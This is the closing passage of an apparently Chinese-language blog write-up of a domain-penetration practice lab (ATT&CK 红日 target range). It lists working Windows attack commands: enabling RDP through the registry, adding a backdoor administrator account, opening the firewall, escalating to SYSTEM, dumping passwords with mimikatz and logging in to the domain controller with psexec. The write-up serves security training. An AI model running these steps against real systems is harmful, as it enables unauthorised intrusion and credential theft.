<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173706088.png" alt="图片"></p>
<p>  至此，内网渗透完毕，已经成功获取所有主机的权限，实际上真的有这么简单🐎？ 其实之前能够这么快获得所有主机的权限，是因为我的得到了域管理员的账号密码，但是在实际情况下，基本上是不可能的，只是这里的靶机故意而为之，所以真正的内网渗透并没有这么容易。当然从这里也知道了，拿域控的关键还是在于获取域控主机管理员的账号和密码。</p>
<h2 id="0x04-基于rdp形式的内网渗透"><a href="#0x04-基于rdp形式的内网渗透" class="headerlink" title="0x04 基于rdp形式的内网渗透"></a>0x04 基于rdp形式的内网渗透</h2><p>上面基本上都是在cs一套流程走完的，但是在真实的环境中，一般都是会有一些杀毒软件的，如果您不会免杀，木马根本没法在cs上上线，所以这个时候也可以通过一些其他的办法来进行操作。</p>
<ol>
<li>可以发现目标机未开放338端口，所以我们可以先开启3389端口</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">#启动 3389端口REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server &#x2F;v fDenyTSConnections &#x2F;t REG_DWORD &#x2F;d 00000000 &#x2F;f<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173720678.png" alt="图片"></p>
<ol start="2">
<li>添加一个管理员权限的用户</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">#添加用户并把用户加入管理组net user test1 test.123 &#x2F;addnet localgroup administrators test1 &#x2F;add<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173722800.png" alt="图片"></p>
<ol start="3">
<li><p>但是发现并不能登陆3389，因为目标机开启了防火墙，所以我们得关掉防火墙或者添加一条3389的入站规则。但是执行防火墙的操作必须得是sytem权限，所以这里还是得提权，这里用getSytem.exe这个提权工具即可轻松以system权限执行命令。</p>
<p>(ps: 也可以通过正向代理的方式进行登陆，下节靶机内容再用这个方法）</p>
</li>
</ol>
<blockquote>
<p>netsh advfirewall firewall add rule name=”Open 3389” dir=in action=allow protocol=TCP localport=3389</p>
</blockquote>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173725096.png" alt="图片"></p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173726769.png" alt="图片"></p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173728697.png" alt="图片"></p>
<ol start="4">
<li>利用免杀版的Mimikatz来获取账号密码（因为我这个是交互式的，所以必须得登陆3389才行）</li>
</ol>
<blockquote>
<p>mimikatz</p>
<p>#log mimikatz </p>
<p>#privilege::debug mimikatz </p>
<p>#sekurlsa::logonpasswords</p>
</blockquote>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173731422.png" alt="图片"></p>
<p>大功告成，用psexec来登陆域控主机啦</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173733179.png" alt="图片"></p>
<h2 id="0x05-总结"><a href="#0x05-总结" class="headerlink" title="0x05 总结"></a>0x05 总结</h2><p>  域渗透（不谈维权和痕迹擦除等）主要目的为了拿到域管理员的密码 ，然后登录域控。</p>
<p>  人生漫漫其修远兮，网安无止境。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">RHacker</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://rhacker.cn/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/">http://rhacker.cn/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">RHacker</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                                    <span class="chip bg-color">内网渗透</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    
        <link rel="stylesheet" href="/libs/gitalk/gitalk.css">
<link rel="stylesheet" href="/css/my-gitalk.css">

<div class="card gitalk-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="gitalk-container" class="card-content"></div>
</div>

<script src="/libs/gitalk/gitalk.min.js"></script>
<script>
    let gitalk = new Gitalk({
        clientID: '',
        clientSecret: '',
        repo: '',
        owner: '',
        admin: null,
        id: '2021-04-15T17-07-25',
        distractionFreeMode: false  // Facebook-like distraction free mode
    });

    gitalk.render('gitalk-container');
</script>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/23.jpg" class="responsive-img" alt="ATT&amp;CK 红日靶场实战演习心得笔记(一)">
                        
                        <span class="card-title">ATT&amp;CK 红日靶场实战演习心得笔记(一)</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-04-15
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="post-category">
                                    内网渗透
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                        <span class="chip bg-color">内网渗透</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/04/15/2021%E5%B9%B4%E6%95%B0%E5%AD%97%E4%B8%AD%E5%9B%BD%E5%88%9B%E6%96%B0%E5%A4%A7%E8%B5%9B-%E8%99%8E%E7%AC%A6WP/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/17.jpg" class="responsive-img" alt="2021年数字中国创新大赛-虎符WP">
                        
                        <span class="card-title">2021年数字中国创新大赛-虎符WP</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-04-15
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/CTF/" class="post-category">
                                    CTF
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Reverse/">
                        <span class="chip bg-color">Reverse</span>
                    </a>
                    
                    <a href="/tags/Web/">
                        <span class="chip bg-color">Web</span>
                    </a>
                    
                    <a href="/tags/Crypto/">
                        <span class="chip bg-color">Crypto</span>
                    </a>
                    
                    <a href="/tags/Misc/">
                        <span class="chip bg-color">Misc</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: <br />'
            + '文章作者: RHacker<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2021</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">RHacker</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">6.6k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
